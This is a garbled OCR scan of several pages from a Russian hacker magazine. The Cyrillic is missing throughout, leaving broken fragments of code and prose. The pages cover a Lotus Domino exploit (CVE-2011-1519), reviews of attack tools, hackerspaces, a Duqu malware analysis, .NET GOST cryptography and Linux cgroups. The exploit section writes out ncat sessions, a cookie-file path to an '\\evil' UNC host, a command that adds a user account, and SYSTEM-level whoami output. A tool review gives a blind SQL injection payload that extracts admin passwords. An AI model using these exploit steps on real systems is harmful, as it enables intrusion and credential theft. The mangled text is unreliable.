. DJ decompile [ membes .

i f (!appletConnection)
// #APPLET,
fiag=vrfyPwd.verifyUserPassword(pwd,userinfo.userPWD());
else // #APPLET
/ 1 COOKIE? !
fiag = verifyAppletUserCookie(usr, pwd);
} while ( true ); // end loop
i f (fiag) // ,
// , !

,
#APPLET
#UI #COOKIEFILE. ,
, ,
Nt-

01 /156/2012

069

admindata.xml. , no n,
[ NOT_REG_ADMIN !'

LOAD CMD.exe
BeginData

net user add username password /ADD

<<
. n
n

#APPLET ,

adm, n

cookie .

~.

n #UI, n

veifyAppletUseCookie:

, #COOKIEFILE.
,

//#COOKIEFILE <cookieFilename>
i f (cookieFilename == null 1 1 cookieFilename.length()
return flag;

/ / - !

File file = new File(cookieFilename);

#EX IT

,
' ? n
,
LOAD, n
n.

inputstreamreader = new InputStreamReader(


new FileinputStream(file), "UF8" );

,
n . , IBM
LOAD

// s7do {

if ((j

cookieFilename

, n.
, m-, n , n

s7.indexOf( "<user " , j)) <= ) break ;

. LOAD
n , n n

String s2 = getStringToken(s7, "user=\"", " \ "" , j, k);


String

s =

getStringToken(s7, "cookie=\"", " \ "" , j, k);

String s4 = getStringToken(s7, "address=\"", " \ "" , j, k);


i f(s5.equalslgnoreCase(s2) && s6.equalsignoreCase(s3)
&& appletUserAddress.equalsignoreCase(s4)) { // !
flag = true ; break ;

ncat --ssl tagetlotus_host


#API

25

#L

#COOKIEFILE \\fileserver\pulic\cookie.xml
#USERADDRESS dsecrg
#UI usr,psw
VALID_USER
#

$whoami
whoamiBeginData

while ( true );
, n
usename, passwod addess usename, passwod

Microsoft Windows [Version 6. 1 .761]


Copyright () 2eeg Microsoft Corporation. Al l rights reserved.

addess cookiefile, ,
n n' ,
:

1.

<us> .

2. usename, passwod, addess.

3.

4.

n ,

C:\Lotus\Domino\data>
n , n

n .

, n

#API , API Jv-, -


, ncat . ,
Lotus ,
n SMBRelay.

CVE-2011-1519
.

1.

C:\Lotus\Domino\data>whoami
NT AUTHORITY\SYSTEM

cookie.xml:

?
<user name= "usr" cookie= "psw" address= "dsecrg" >

, . ?

, -. - ,
n, usr .

2.

n ,

, n \\fileseve\puic\cookie.xml.

3.

n ncat:

c-..-.. ~no

'"...........

C'adlf.Ctt.&........Joo

Lqou-os.Fn,OJOcc:OII

c...

,..nw,_,...

C...tllll~ll:

ncat --ssl targetlotus_host


#API

25

#L

..._, L., ~

D~l'1to ,07 0c<~D!I'" .1'-l4

#COOKI EFI LE \\fileserver\puic\cookie.xml


#USERADDRESS dsecrg
#UI usr,psw
VAL ID_USER
#

070

01 / 156/2012

Lotu s,

S- ? ,

, UNC (
, !.
,
- . , IBM

, : cookiefile
.>> . ,

- \\evil\cookie\file,

1.

, : .\\evil\cookie\
file, UNC . ,

. , ,

SSL-,

[,

i,

ARP-POI SONING,

DoS -

mail . u l.

IBM! , cookief il e,
, - L-

2.

, .

L- . XM L,

- , [

' , , IBM,

l. ,
, ,

L- :

, ,

c ?xml version= "1 . 0" encoding= "UTF-8" ?>


cuser name= "admin" cookie= "dsecrg" address= "dsecrg" >

[,

.
Bla-a-acuser

! - ,
- ,

name= "admin" xXXxcookie= "dsecrg" Xaddress= "

dsecrg"NYA>
4.
>>

Java 6

ASLRI.

. .

. , , ,

1.

99

cookievalues Microsoft I

service ( \\n- Entel:

ncat targethost 49152


GET /<user HTTP/1.0\r\n
\r\n

HP/1.0\r\n

#APPLET
#COOKIEFILE .. \ .. \ .. \windows\system32\logfiles\httperr\
httperr1.log
#USERADDRESS http://twitter/asintsov
#UI admin,pass

\r\n

ncat targethost 49152


GET /user= "admin"cookie="pass"address="http :// site.com"

2. - :
#5oftware: Microsoft ! 2.0
#Version: 1.0
#Date: 2011-08-22 09:19:16

$whoami
NT AUTHORITY/5YSTEM

UNC,

2011-08-26 11:53 :30 10.10.10.181 52902 10.10.9.9


47001 / 1.0 GET cuser 404 - NotFound 2011-08-26 11:53:30 10.10.10.181 52905 10.10.9.9
47001 /1.0 GET name="admin"cookie="pass"address="
http :// site.c o;n '> 404 - NotFound -

- .

. -,
,
, .

: IBM

-, .

<user >> ,

-, ,

%20>> [ , !. ,

- [

, <use r >>

, LOAD TELL

( 404 NotFoudl .

!. -

3. ,
-, :

admidata . xml.

MD5. ,
4, 25 26 ,

ncat --ssl tagetlotus_host 2050

. ,

#!

, ' I

01/156/2012

071

Mar licq 884888, http://snipper.rul

scarletO

....
-
""""'

bit .ly/t l56m2


:

URL:

Windows

3. 14.y/r u/md5

Windows

URL:

......,...
,.,

. "'

Win dows

cel1697i845
URL:

bit.ly/v mJ2g8

-~
~

,""

'

'

..

:. ~

'

. ..:;:;
. .
~
~

'

MSSQ L lnjection Helper-

, n

SQL-

D5-

.
,

, -

MSSQL.

BarsWF- World Fastest MD5 cracker.

n n

n ,

, ,

n SQL-.

5-

? n

. ?

npor :

Brutus hashes. New generation>>

'

Microsoft

SQL Server;

GUI-

, ,

, ;

MD5;

, ,

u :

1.
2.

1.

. n,

Quad QX6700 [3,01 GHzl


200 n

3.

'

4.

'

MSSQL lnj ection Helper

,
,

URL
[, site .com/script.asp?id =11
.

2.

lntel 2

Radeon:
AMD BROOK,
CUDA
NVidia.

:-1

072

n;


, n .
n
.

,
.

6 131 066 257 801

01/156/2012

X-Tools

PANBu ste - ,

Mastecad, Ameican E xpess,

, l

:
Security

! .

1000 BINI;

PAN
My5QL, M55QL l-l,
P ostge5 QL , Exce l, VMwae VM DK, l

PAN ! ! .

!);

PCI 055,

, PANBuste

I.ZIP,

.GZ, .TGZI;

PCI Q5A,

Research Labs
URL:
www.xmco.fr/
panbuster.html

.
: -

*nix/win/mac

JCB, D iscove,

Chia Unionl;
!

Windows,

L i u x,

05 ;

IV15A,

:
I

1./pabuste
-1 ../1 ,
!
- -! .

YGN Ethical Hacker


Group
URL:

URL:
bit.ly/vZbhcN
:

it.ly/vDpEtB

Windows

SuRGeoNix
URL:

~ ----..

it.ly/IXxlkm

=-

Windows

*nix/win
'~

WEBSURGERV, _ __

OWA5P Joomlal Vulneability 5canne-

W5'

, sn- . ,

. ,

, 55,

Joomlal

Web5ugey : -,

5QL-

. ,

Do5

WAF,

- .

. , DDM g -

- .

sn-

n,

WAF

5Q L-.

vuln.php,

1. n llnitial Requestl:

5- .

HTML-

! ,

);

My5QL

GET /vu ln.php?id=


HOST : 1.2.3.4
2.

/1.1

IList Configuationl :
- 1 32l MD5-

DDMg

xe al, -

. :

.
,

3.
joomscan.pl -u http: // joomla-site.com/ \
- pro xy: port

01 / 156/2012

GET /v uln.php?id=1+and+'${List_2}'=
substring((select+password+from+admin+
limit+1),${List_1},1) / 1 . 1
HOST: 1.2.3.4

073

071,

01/156/2012

, ? H ackespace

hackspace- ,

. ,

>>

I.

n .

. ,

n, ,

, ,

, , .

, ,

- ,

, >>

n . ,

, ,

, . -

, n

do it youself

[ ]. , -

{neuron}

.


,


.
,

,
-

,
.
,,

01/156/2012

075

:1.


,
,
-
,

. ,
,
ha ck e s pa c es.og ,
,
. - ---

.
, ! .

<< ,

.
,
>> ,- ,


Nu

l n e u o nsp ac e . u ).
<<
. ,

FOSS Labs

C-Base. n !

:
, ,

-,

, ,

N u

! ,

, -. ,

- ,

<< :

leSage lab,

, , ,

, ,

. ,

. ,

30-50

1000-1500

. ,

, -

, - ,

, -

, , ,

- : D- ,

. ,

, ,


C-base

London Hackspace (LHC)

NYC Resistor

: www.c -base .org.

: londo n.hackspace .org .uk .

n : , .

n: , .

n: , - .

: 300+.
:

: 300+.
:

: 30+.

5 .

076

17 .

C-base

1995 .

2009 ,

www.nycresistor.com .

11

RESISTOR

$75-115.

NYC Resisto-o

2008 .

01/156/2012

], IFaiwaves, ]

leSage laI .

Ust of Hacker Spaces

l'hls 11 1 comprehenslve, user~al ntalned lllt of 111actJve hecklrtPICII throughout the wortd.

. , ,
f-J>>,
,
.
, , , ,

We hiiVt: ilbll il ~at D( p!atd Hickgr SQIC!J 1 1 WI M1 1 8 !jst pf hackt[!iDiiCO'i t:rtJnd


1>t:ddahackcr~pacc

th4i

giObl including thOII 1til

in

uilding PfOCIII 1 t:lrlildy

c loaed.

Ustoft:vt:ntli

his ~

is cac:had dua to its long renOenng time . lf you want to tluah tn.

, ~

LRtof~WC>Jt:ds

Liep

:o-addaproject

iltii/W

)'1)

1 Tt lflln 1

Recenlchanou

1 ""'''"' 1


, .
- ,
, ,

Aall!tlld o:NIIOCI

SOoocitol pt: gt:l

--

~
.

Z;,;Ic

:0-:"-:--iljiL-'

t-,1

lfwt:'rt: tnllling YOtil

. ,

sp.t:, 01'

yOtJ wt:nt

t:nd,f ~ alt.lt

hadr.erspace

to c railtt: new

orr , /801 51 ~

to th4 h t .

C-base .

bttpl/aQLadwrtrtChprgdl
NOvemII'"

....

PILAIO

OSG - Optn

lgrj1tpry

1i11:IJJ:i

--

n:_

"'"

Nove mef

, .

. ,

htI/www ISJ!Dtrk,ac

cpmrf

Novernt>.r

, ,

, - , ... ,

:]. ,

2011

, .
Nu

u s . u .

. ,

!
30-]. Nu

dui. ,

, , .

. ,

! -

<<

Softwae Defied

, , , :

WiMAX GS

. ,

?.

D-. ,

, ,

. ,

Nu,

Radio,

15-17 .

15 ,
150,

, .

,

iberpipa

Metalab

: www.kiberoipa .org .
: , .
: 20 40 ,
n.

Ca : www. metalab . at .
: , .
: 130+.
:

>> -

!
, ,
,

20 .

: .

18'.

kiberpipa

___:_ _ _ _ _ __.J

. , 2001

2006 .

, ,

-.

01 / 156/ 2012

, !,

Metalab

].

>>,
!
- HackSpace Sait-Petesbug,- -

077

.
- .
,
.

<< : -

3D-, ,
n , , n
3D- -
.

,
~

, , ,

n ( hackspace-spb.u ].

n .

,
,

, (

(polakumekay.
com]. ,

29 .- .

, . n,

Mifill] : , -

: <<

. -

. ,

40 . -

, .

. : ,

. ,

, .

( ]

. ,

, .

, ,

n C-Base, , ,

078

01 /156/2012

. ,
,

[Space Foundation

, !,
,
,
~
. ,
, .

Neuon .

100 .
120 .

[ !,
.
<< :
.
, ,

. n

NYC Resistor

. ,

. , ,

, , ,

:1.

-,

,-2.

[, -

Neuon n

$50-100,

, !,

n .

[, ,

, n

10-30 !. ,

. , ,

- ,

- ,

, ,

- .

C-Base

, ,

300.

- . C-base

HackSpace-SPb

. ,

, ,

, .

, .
?

~
, , <<

, ,

Space Foudatio, -

. :::

? .

-
-

NYC Resisto.

, , MakeBot,

30-.
-

30 .

. ,
-
.-

NYC Resistopoca:

. ,

. :1
,
, ,

. ,
,

01/156/2012

200-300 -

079

MALWARE

Senior malware researcher, ESET

.....

Stuxnet

IDA

Stuxnet,


. ...

WIN32/DUQU:
Certificate

- . -

General 1Details 1Certification Path 1

STUXNET

~ Certificate lnformation

This certificate is intended for the following purpose(s):


Ensures software came from software puiisher
Protects software from alteration after puiication
,

RSS- .

* Refer to the certification authority's statement for details.


Issued to:

-Media

Stuxnet ...

. ,

Electronics Incorporation

Symantec,

, - , - -

sh

Issued : VeriSign Class 3 Code Signing 2009-2

Stuxnet

Duqu. ,
Stuxnet. , Duqu

Yalid from 8/2/2009 to 8/2/2012

, Stuxet.

=1

Instal Certificate ..

Cyptogaphy

Issuer Statement

and System Secuity (CySyS].


Duqu, Stuxnet,

. , CySyS
-

080

Duqu

, .

1. - !

01 / 156/ 2012

void

Verity Certificate

OtcrRoutit~e ( int ,

<'~

.. ...

chr

Yff~r .

int

lkrff~rSiz

,.,

Common Name: C-t.le<!ia Electronics lncorporation


Status: Revoked

Jb

sh01' t

'"

test

Validily (Gt.l ): Aug

2009- Aug 2, 2012

Class: Digila! IO Class - Soft\'l are Va lid ation


FreeReplacement
-

&uffl!rSizt

l_129!
[ +8 ]

edi , Bufftr

[es i +r:di ] , cl

~l

Microsoft Soft\'lare Validation v2

-......,
,

City/Location : Taipei
Serial Number:

t:cx ,3

State: Tai\1an
Country:

esi, es1

loc_12919 ~

Organization: C-Me<!ia Electronics lncorporation


Organ izationa l Unil: Digilai iD Class

ea: ,8471122h

I!CX

edx,

1E2060A3n

eu ,

....

ex ,4747293h
edx , OCh

loo

t-<fx , (edx+ l!iiX+l )

add

I!Si , l

'"

,
esi , ebx

~.

jb

04e931f57 ebc5947d3dc4e e 7a236e

edlf,

short

l_129 10

loc_l293A~

lssuer Digest: 2a48d0fcac3ca29d9a34 fff50b2c29f

esi

.2. .

4. n

IU:teiiiili

Duqu

5.

Stuxet

, .

cmi4432.sys,

, ,

, VeiSign

Duqu,

Stuxet,

C-Media Electonics lnc. ,

2012 ! 1].


Duqu :
0) d-,
, CVE-2011-3402.
1) -

. ,

.

w i32k. sys.

2) -,

DUQU

,
,

3)
4)

Duqu

3.

, .

n ,

sevices .e xe

. ,

Duqu

. .

n , .

Duqu

Stuxet .

Duqu

4.

-, .

Duqu

, , ,

, -

Name

Stuxnet.

5
Stu xnet, 6- Duqu .

Size

LJ 566168ff21437205807

LJ Oeecd17621535878724fd800

LJ 94c4ef91dfcd0c53a96fdc387f9f9c35

LJ 4541e850a228eb69fd0f0e92462445

u 9749d38ae9b9ddd81b50aad679ee87 *
b4ac366e24204d821376653279cbad86 *
u e8d6b4dadb9ddb58775e6c85O6cc *

192,512
24,960
6,750
29,568
85,504
232,448
6,750

[,

) : , ,
, , , , , , .
, .
, ,

Duqu

Stuxet.

,
. ,

,

. .

01/156/2012

Stuxet,

Duqu.

081

MALWARE

, .

Win32/Duqu,
n,
n .

, n , n n
n n .
,

Duqu

, !
, !.

. ,
.

7. n

main.dlliocoo
Duqul,

U-.

def dec rypt( data) :


gamma = (02,

7 ,

n .
072, 073,

034, 099,

0x7l,

098, 0)

= 0

<<Duqu: the

for ix in xrange(len(data)) :
data ( ix] = ga!.ma ()
= + l
if == 7:

us

to the next Stuxnet>>

36

. ,

n ! 81.

=0

, ,
, , n -

8.

time of infection
to live
.

9.

time of infection
to live
.

10.

14.10.2011

1.11.2011

3.11.2011

4.11.2011

Duqu: the precursor to the t Stuxnet>>,

Microsoft Security Advisory 126396581,

!, ,

!.

Win32/Duqu.

CrySyS

19.10.2011

ICVE-

CVE-2011-3402
Microsoft
Active Protections Program
IMAPPI.

2011-34021,

wi32k.sys

CrySyS, Symatec
Microsoft .

CrySyS.

TrueType .

,
.

082

01/156/2012

1 -~ "i.

!..-. ; -

~-~ ,. .?J

SD-

r-

l
-- r==:::: .

r:::-1-,---'--;

1-day

0-day

~ <non""'"" RPC-np""'"'

11. RPC Duqu

( )

, ,

36 ,

30 .
11.08.2011,
36

7:50 :01

, 9,

18.08.20 11 , 7:29:07
R-

30 -

10.

DUQU VS STUXNET

R-

Visual ++

ATL

UPX

Stuxnet vs. Duqu

Duqu St uxnet. R-
Stuxnet. Duqu n ,
n <<Stuxne t unde

RpcHandler_ '-

the Mi coscope l.

CeatePocessll;

56-57),

n.

RPC

Rndl_S - (,

n Duqu BinDiff,

);

Rndl_6 - ;

11).

Rndl_7- .

, n

Duqu . RPC :

RpcHandler_1- ;
RpcHandler_2 -

12.

R -

Rndlr_- ;

?

-

Stuxnet

80

: ) ,


<<?>>.
,

. ,

. , Stuxet, Duqu

. ,
Duqu,
,
,
r .
- ,
.
, , ,
.

12.

01 /156/2012

Duqu . :::

083

- - .- __ _
-------.---..._
-... ----------------...
--.----...
------
---------______...... ---..-

___

...._

___
-___ __
-----..
--------
__ ___. . __
-----.....

----~

...........

,",__,_
-~--~....

....
~---....

....

...,_,""__

1
2-

W.1r 3
<tr -1

<~

11 ~ >

.. .

(>~ n .. .

.. .

Program: C:\Program Files\Rising\RIS\rsmain.exe


r: lv! BR-ce op
:

1i32/ G h odo N. NA D

r1

ESET

This application has requested the Runtime to terminate it in an unusual way.


Please contact the application's support team for more information.

r
11 . r 1
.

Program: C:\Program Files\Rising\RIS\RsTray.exe


nII

r r1 ,
11
11.

This application has requested the Runtime to terminate it in an unusual way.


Please contact the application's support team for more information.

Preview
UNIXOID
"NRID
gd,
-
,

d id- .
,

firmware.

,
,

,

,
,

, G- . .
-
did-
.

. 1

. 2 .1

8 1.2 81.1

--

. . . .

, ,. , , , .

,,.

.-

-.

Microsoft. -.

. su .

SYN\ACK

11

>> ?
, , ,

SYN\ACK

UNIXOID

01/156/2012

<<

100 .
.
?

FERRUM

-NS'
Petium
ID--su!

, 12

NAS'e .


,
,
. .

087

plaintext [f i stlaplaintext.su, www.plaintext.sul


OCCTEMO.NETFRAMEWORK

Stong name
- n ,


, ,

.NET

F amewo k,

System.Secuity. Cyptogaphi,
,

CL R

.N ET

F amewok

.NET,

SYSTEM .SECURITY.CRYPTOGRAPHI

, ,

System . Secuity.Cyptogaphi,

-
n

[].

- ,

, - . .;

-
, . . ;

htto: Uaacbowse r.
ogsoot .com/ -

GAC

ws.

.509 L-

[XM L Sigatuel.
,
,

bjt.[y/uyxZs5
- ,

28147-89

088

F amewok

.NET

#.

[.

1]. ,


Symmeticlgoithm, -

01/156/2012

.N-

AssymeticAigoithm, - HashAigoithm
KeyedHashAigo i thm ,

-.

.NET

-1

, ,
.

28147-89

, ,

~.

SYMMETRICALGORITHM
.NET Famewok

SymmeticAigoithm.

MSDN,

puic

puic

.........._

RSA

DE-DEOES

--

pulic

OSA

AES

RC2

puic

-.._

virtual ICryptoTransform CreateDecryptor();


virtual ICryptoTransform CreateEncryptor();
abstract void GenerateiV();
abstract void GenerateKey();

----

.n

11
1
1 4
1 LJ
1 4 ~
1_, _ _

11

11
4
11

11
4
1
LJ
1
4 ~- ~

,. _

~ : """"""" ~

~ 8fiiOPIIIIII

11

Ass)'metric:~

Ass~uici<~Jonnanor

Ass~U.~

..__

T~S

11
J
1
1
1

IS1

~S

1 --1

1
1
1

......."
$A51 2anaged

.N

1
J
1
1
...,.
1
4...".",....._ 1
.......
1

-~
1
...... _
1

--1

1 -

1
1
1
1

"""""

.....,..
....,.._

...."....,_

Framework

,
,

namespace Gost

. ,

ICyptoTansfom .

puic

MSDN

. ,

class GostCfb : SymmetricAlgorithm

ICyptoTansfom

pulic

. :

pulic

byte [] rgbKey,
byte [] rgV

int TransformBlock(byte[] inputBuffer,


int inputOffset, int inputCount,
byte [] outputBuffer, int outputOffset);

){}
puic

byte [] TransformFinalBlock( byte [] inputBuffer,


int inputOffset, int inputCount);

puic

MSDN

, ,

){}
puic

[) .

{}

28147-89

override ICryptoTransform CreateEncryptor

byte [] rgbKey,
byte [] rgV

SymmeticAigoithm, ,

over r ide ICryptoTransform CreateDecryptor()

{}

n
, - .

GostCfb(){}
override ICryptoTransform CreateDecryptor

puic
puic

override ICryptoTransform CreateEncryptor()


override void GenerateiV(){}
override void GenerateKey(){

, . ,

.NET Famewok'y

, ,

[CFB).

,
.

KO,LJ,M 28147-89

private static byte [] GetRandomBytes( int bytesCount)


Qivate static void Gamm( byte [] input,
byte [] gamma, byte [] output)

, 28147-89

[ )
,

.NET Famewok'a CFB.


GostCfb,

.NET

FRAMEWORK'Y ,
,

CFB (r )

01 / 156/2012

(CFB)
089

Gost"

010
~~CickOnce

--

i:.Of.'llj~
..,

l1nl

~rw.....,.~
CJI(:t.a~

!..,1

....,

---

.J

rl

- << >>,
. <<>>

[ , ] ,

....

'""'"""''

[ , ] .
, .

........

~eqlo!IA/I-crpororo~
"
'"--

ToA~oU~OJIO....I"'CCIaQ

8 ~~r:nt1113~-N111,Uf,

010 [object

identificato],

010

[,

XOR . ,

] ,

, .

GetRadomBytes

GeeateiV Gt:

lacs], :

010

IVValue

KeyValue,

"{joint-iso-itu-t(2) ds(5) attributeType(4)


distinguishedName(49)}"

. , ,

64 256 .

"2.5.4.49"
puic

GostCfb()

{
LegalBlockSizesValue = new []
{ new Key5izes( 64 , 64, ) };
LegalKeySizesValue = new []
{ new Key5izes( 256, 256, ) };
BlockSizeValue = 64 ;
KeySizeValue = 25 6;

]. ASN.1 ,
,
-
.

www. o i d- ifo . c om .

ASN .1- - -

tnt

tt, GostCfb

, ICyptoTansfom.

ASN .1
ITU-T, ,

private sealed class

GostCfransformEncr:ICryptoTransform

{}
private sealed class
{}

GostCfransformDecr:ICryptoTransform

KACCGOSTCFBTRANSFORMENCR
tnt
-

, ,

, CFB,

. GostCfb.

, << ,

21 , ].

, .

!] ,
.

OID

11

private byte [] m_Key;

11

11

private byte [] m_State;

11

private byte [] tmpState;


puic

090

int TransformBlock( ... )

01/156/2012

.N-

r~at~ ();

byte[] plainBlock
int result = ;

{Gost.GostCfb)
64

new byte[ 8);


new
imitoStr :

CryptoStr~am ~ncr

while (inputCount >

CryptoStr~am

11
Array .Copy(inputBuffer, inputOffset, plainBlock, , 8 };
Gost28147 . Gost28147Ecb(m_State, tmpState, m_Key);
Gamm(plainBlock, tmpState, m_State);
Array.Copy(m_State, , outputBuffer, outputOffset, 8}
inputCount -= 8;
inputOffset += 8;
outputOffset += 8;
result += 8;

CLR

28147-89.

return result;

16

16 ! . , ,
HashAigoithm, , ,

. ,

KeyedHashAigoithm :

XOR.

, ,


28147-89 Gostlmito.
Ke yVal ue
Ha shVa lueSize 32,
32 .

TansfomFinaiBiock
TansfomBiock , n n .

,
,

HashCoe

- ,

GostCfbTansfomDec

GostCfbTansfomEncr,

lnt enai Tansfoml .

CFB,

, ,

[ ,

!.

, :

DWORD,

16-

KEYEDHASHALGORIH
KeyedHashAigoithm .
HashAigoithm ,
:

protected abstract void HashCore(


byte [) array, int ibStart, int cbSize)
protected abstract byte [) HashFinal(}

--"""'

[~ <CLR2..0

"'""""

0 Solod111No

CLR_.

[8 !

.....t1

\ stmyNemt

lPui~eJ

FSI\Ilp.Lqu.;Servic

FSharp.Pfojtct9-JS\tm.FShlfD

- !~- ;::::~~-::Syattm.PrOPtltYP~s
11-

!Cuituf

0.300flld5

FSI-.rp.\.lgu.;t~S.Vict..It
FSI\arp. Proj\Syl !t.S.It

I.A.-thittctur lv.,.,lon

MOL

09.112010192' :24
09.1120101924:24
09.11 .2010192:24
09.1120101t.24:24
0911201019:2.t:24

""'
M9L

1.00.0

""'"'"

MOL
MOL

03fSf7/11dS
0)15f71tlc!S
0f5f7f1 1d5

hDJMH >d<

GosiAig1

90881J818cl

IE~'::'~"IIVIn

;:;;~;~~

~
SIL

lEost

~fllciS

II Eoat

0300111!5

lnlttoo.SDocVw

lf:k'57eO

U9L
U9L
U9L

ISym\Jptt
ISym\oJr,pper

03f5f7111c!5

32il

~f11d5

S:.!

ISym\oJr~Ptf

"i111!5

)2bll

Of5f1f11d5

S:il

31f38~

MOL
U9l

IS.,.m\kpper

......
~...

01/156/2012

31f3856ad3

GAC Browser

i ~.ttoclified

4.0.0.0
4.0.0.0
4.00.0
4.00.0

""'
""'

03f5f7f11d5

.:.

2.00.0
2.0.0.0
2.0.00
11.00
2.0.0.0
2.0.0.0
400.0
400.0
6.10.0
6.1.0.0

2311201119~1 :5:5

~ -

"''

v4.0
v4.0
v4.0
v4.0
V4.0

'N"'""'

~
14 0720096:20:09

DWORD,

n 16-

[En c yptBiock161,
.

DWORD

, -,

[XOR DWORD
, XOR !,
, .

140720096:20'09
140720096.20-09

10. 1120101952.

14072009620'09
14072009620:09
09.1120101913.36
09112010191].:1
1: 07200910;: 7:27
1l07200910;47:27

uint templnH = Gost28147.Bytes2Dword(array,


( i nt )(ibStart + i * 8));
uint templnl = Gost28147.Bytes2Dword(array,
( int )(ibStart + i * 8 + 4}};
uint tempOutH = ;
uint tempOutL = ;
Gost28147.EncryptBlockl(ref templnH, ref templnl,
ref tempOutH, ref tempOutL,
Gost28147.P, KeyValue);
ulmito = tempOutH;

HashFinal

.
vl .O

,,,

F amewok

.NET

GAC.

GAC
.NET,
GAC, Global Assemy Cache [

091

! .

GAC

oidMa p

oid Ent y.

. ,
, st ong

name,

, .
,

sn .exe,

.NET

<cryptographySettings>
<cry ptoNameMapping >
<c ryptoClasses >
<cryptoCla ss GOSTCFB; "Gost.GostCfb, GostAlgs,

F amewok. :

Version;l.e.e.e,Culture;ru,PulicKeyToken;9be88f4818daa492" />

sn.exe -k keypair.snk

Version;l.e.e.e,Culture;ru,PuicKeyToken;9be88f4818daa492" />

<cryptoClass


keypai.sk.
Sig nig

Sig n the asse m y

31. .

gacutil,

GAC

[.
, .

.NET Fame wo k .
.NET,
GAC .

gacutil / i

<

>

Pu ic k, Cultue

GAC l,
GAC ws [. 41.

GOSIMIQ; "Gost.Gostimito,

GostAlgs,

</cryptoClasses >
<nameEntry name; "GostimitoAlg" class; "GOSIMIO" />
<nameEntry name; "GostCfbAlg" class; "GOSTCFB" />
<nameEntry
name; "System.Security.Cryptography.KeyedHashAlgorithm"
cla ss; "GOSTIMITO" />
<na meEntry
name; "System.Security.Cryptography.SymmetricAlgorithm"
class; "GOSTCFB" />
</cryptoNameMapping >
<oidMap>
<oidEntry OID; "1.2.43.2.2.21" name; "GostCfbAlg" />
<oidEntry OID; "1.2.43.2.2.22" name; "GostimitoAlg" />
</oidMap >
</c ryptographySettings >

Wind ows,

.NET

GostCfbAig
Gost lm ito.

GOSTC FB

GOSTIMITO,
GostCfb, GostlmitoAig

.
machine.cofig,

XM L


cyp togaph ySet ting s,
mscolib.

Name Mapping.

<na meEntry
name; "System.Security.Cryptography.KeyedHashAlgorithm"
class ; "GOSTIMITO" />
<nameEntry
name; "System.Security.Cryptography.SymmetricAlgorithm"
class; "GOSTCFB" />

:
n cy ptoCia ss,

nameEnty. , ,

l.

010

KeyedHashAlgoithm

GostCfb,

Gostlmito

GostCfbAig

i mito

( KeyedHashAlgoithm )

toConfi

. CeatefomName ( "GostimitoA~.

new

'ect l

[ "i$ CryptoConfig System.Security.Cryptography.CryptoConfig

= new t
i mitoSt = new

CyptoSteam n

CyptoSteam

- -

SymmeticAigoithm.

51.

while (rdlen < totallen)


{
t

{key});

System.Secu

base {object}
object
(k, I V) , CyptoSteamode . Wite );
AllowOnlyFipsAigorithms false
yptoSteamode . Write );
; Non-Puic members
11 (i/ appNameHT
Count =
11 , appOidHT
Count =
11 if defaultNameHT
Count = 125
- DefaultNameHT
Count = 125
DefaultOidHT
Count = 28
defaultOidHT
Count = 28
, InternaiSyncObject
{object}
if MachineConfigFilename
.. "machine.config"
machineNameHT
Count = 3
{[GostlmitoAig, Gost.Gostlmito, GostAigs, Version=1.0.0.0, Culture=ru, PuicKeyToken=9088f4818daa492]}
{[System.Security. Cryptography.eyedHashAigorithm, Gost.Gostlmito, GostAigs, Version =l .0.0.0, Culture= ru,
{[GostCfbAig, Gost.GostCfb, GostAigs, Version=1.0.0.0, Culture=ru, PuicKeyToken=9088f4818daa492]}
,

RawView

092

CryptoConfig

01 / 156/2012

.N -

28147-89
28147-89

,
. ,

:
232

11

XOR,

[8 ! 4
mod 2321,

. [

[SBoxl,

.
31- ,

32

28147-89,

8 .

.

.

7.

KeyedHashAigoithm.Ceate,
.

CyptoCofig.CeateFomName,
Activato.Ceatelstace

catch.


ull .

oidMap

010

29

, CyptoCofig

010

. ,

MSON

, oidEty

[ , , GostCfI,
- ,

mt,

010

, - ,
,
machie.cofig .

010

ivt

machieOidHT, - -pivate

machieNameHT CyptoCofig !. 61.

28147-89

CLR

MONO PROJECT

- ,

CyptoSteam,

Steam.

. , ,

Mono,

GAC,

$ gacutil -i

< >

, ,

CyptoSteam ,

- :

- CyptoSteam .

$ gacutil -l

.
-
.

machie.config [ Ubutul /t/m/<


>/.

CyptoSteam
,

. ,

Positio - CyptoSteam.

- - . ::::

01/156/2012

.NET Famewok,

093

li v inside . og s p o t .c oml


.
- , :
.

, .

1100- xl 1 .
, ylxl = + 1100- xl 1.

, .

. ,

- , !

;1.
, , = 10,

50

50

19.

, !.

. ,

.. .

, .

. ,

09-'

01/1 56/201 2

,
, , '
,
.

, : lkl + llkl- 11 + .. . +
llkl- k + 11, k - , -
. ., ,
:

12 lkl- k + 11* k 12. lkl = 100 1 k + k 12- 1/2,


. :! , ,

200, , 14,

tokens = [ for i in xrange(len(tokensdict))]


#
for key i tokens:
tokens[tokens[key]] = key

t = timeit.Timer(setup= 'from __ main __ import func1 ' ,


stmt= 'func1()' )
prit t.timeit(number = 1 )
t = timeit.Timer(setup= 'from __ma i n__ import func2' ,
stmt= ' func2() ' )
print t.timeit(number = 1 )

.
:

$ python2 test.py
:

6.889592934

.ss8578

tokens = []
for token in tokeniter:
i f token not in tokens:
tokens.append(token)

600 .

Olnl,
.

tokesite- ,
, .

Oilog nl .
.

tokesite.


n ?

Linux.

if token not in

tokes: >>, -

Ol * ml, 1 < m < n.

cpulimit,
SIGSTOP SIGCONT:

, n
. ,

# cpulimit --pid=<pid> --limit= <value>

- , .

value ,

import random
import timeit

pid.

CPU, ,
4 -

#
#
f

99999

, 100%, 400 %.
cgoups ,
.

[]

for i in xrange( 1, 2 ):
f.append(random.randrange( 1,

1 ))

...

cgoups :

#
def func1():
tokens = []
for token in f:
i f token not in tokens:
tokens . append(token)
# n
def func2():
tokensdict = {}
i =
for token in f:
i f not tokensdict.has_key(token) :
# :

tokensdict[token] = i
i += 1

ft

01 / 156/2012

$ yaourt -5 libcgroup

________________________

095

,
:

group default {
perm {
task {
uid
root;
gid
root;
admin {
uid
root;
gid
root; }}
cpu
cpu.shares = 10; }}

, - .

: al , l

, .

! !.
,

group daemons/tomcat {
perm {
task {
root;
uid
root; }
gid
admin {
uid
root;
gid
root; }}
cpu {
cpu.shares = 4~; }}

Python.

, URL !
URLI, N
.

N,

1.

theadig ,

let, gevent, Twisted

event-

group daemons/postgres {
perm {
task {
root;
uid
gid
root;
admin {
root;
uid
root; }}
gid
cpu {
cpu.shares = se; }}

. , ,
.

filteed , .
:
;

mount {
cpu = /mnt/cgroups/cpu;
cpuacct = /mnt/cgroups/cpu;

!
, !.

: daemos/tomcat- 40

n :

postges-

%, daemos/
50 %, default -10% .

IP- - ! ,

. /etc/cgules . cof:

/, !:

<user>
